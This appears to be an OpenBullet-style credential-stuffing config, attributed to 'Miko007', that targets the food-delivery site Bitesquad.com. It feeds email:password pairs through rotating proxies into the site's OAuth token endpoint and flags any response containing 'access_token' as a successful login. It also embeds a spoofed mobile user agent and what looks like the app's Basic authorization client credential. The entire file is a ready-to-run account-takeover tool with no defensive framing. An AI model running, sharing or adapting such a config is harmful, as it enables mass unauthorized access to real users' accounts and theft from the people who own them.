[SETTINGS]
{
  "Name": "Bitesquad.com",
  "SuggestedBots": 30,
  "LastModified": "2019-04-07T14:42:40.6972522-07:00",
  "AdditionalInfo": "Token-VGhpcyB3YXMgZG9uZSBieSBjb25maWcgbWlrbzAwNy4= - Configservice.club",
  "Author": "Miko007",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#Login_Post REQUEST POST "https://www.bitesquad.com/oauth/v2/token" AutoRedirect=TRUE 
  CONTENT "username=<USER>&password=<PASS>&grant_type=password&device_id=d9c8ad68-0453-4e56-94db-06fb95bfc5b8" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: okhttp/3.8.1" 
  HEADER "Pragma: no-cache" 
  HEADER "Authorization: Basic Ml8zbnpiY2prN3p4dXNrdzA4OG9vMG9rd284NDQ0Y3c4MDhrbzhzb3NrMDhvc2c0OG9vZzpvOTllNTh6aHJkd3djMDBzY2t3NGs0OG9rczAwNDBzazA4Y3cwd3NvZ29jNHMwNGM0" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "Content-Length: 125" 
  HEADER "Host: www.bitesquad.com" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Accept-Encoding: gzip" 
  HEADER "User-Agent: okhttp/3.8.1" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "access_token" 
  KEYCHAIN Failure OR 
    KEY "<SOURCE>" DoesNotContain "access_token" 
